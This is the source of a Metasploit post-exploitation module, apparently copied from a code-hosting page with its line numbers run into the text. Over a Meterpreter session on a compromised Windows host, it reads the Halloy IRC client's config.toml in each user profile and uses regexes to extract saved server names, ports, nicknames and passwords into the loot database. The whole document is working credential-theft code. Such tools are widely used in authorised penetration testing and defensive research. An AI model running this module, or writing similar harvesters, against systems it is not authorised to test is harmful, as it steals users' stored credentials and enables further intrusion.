Path: blob/master/modules/post/windows/gather/credentials/halloy_irc.rb
19664 views
# This module requires Metasploit: https://metasploit.com/download1# Current source: https://github.com/rapid7/metasploit-framework2##34class MetasploitModule < Msf::Post5include Msf::Post::File6include Msf::Post::Windows::UserProfiles7include Msf::Post::Windows::Packrat8ARTIFACTS =9{10application: 'Halloy IRC',11app_category: 'IRC',12gatherable_artifacts: [13{14filetypes: 'logins',15path: 'AppData',16dir: 'halloy',17artifact_file_name: 'config.toml',18description: 'Saved Bookmarks',19credential_type: 'text',20regex_search: [21{22extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',23extraction_type: 'credentials',24regex: [25'(?i-mx:server =.*)',26'(?i-mx:port =.*)',27'(?i-mx:nickname =.*)',28'(?i-mx:password =.*)'29]30}31]32}33]34}.freeze3536def initialize(info = {})37super(38update_info(39info,40'Name' => 'Halloy IRC Credential Gatherer',41'Description' => %q{42This module searches for credentials stored on Halloy IRC Client on a Windows host.43},44'License' => MSF_LICENSE,45'Author' => [46'Jacob Tierney',47'Kazuyoshi Maruta',48'Daniel Hallsworth',49'Barwar Salim M',50'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org51],52'Platform' => ['win'],53'SessionTypes' => ['meterpreter'],54'Notes' => {55'Stability' => [CRASH_SAFE],56'Reliability' => [],57'SideEffects' => []58}59)60)6162register_options(63[64OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),65OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),66# enumerates the options based on the artifacts that are defined below67OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])68]69)70end7172def run73print_status('Filtering based on these selections: ')74print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")75print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")76print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")7778# used to grab files for each user on the remote host79grab_user_profiles.each do |userprofile|80run_packrat(userprofile, ARTIFACTS)81end8283print_status 'PackRat credential sweep completed'84end85end868788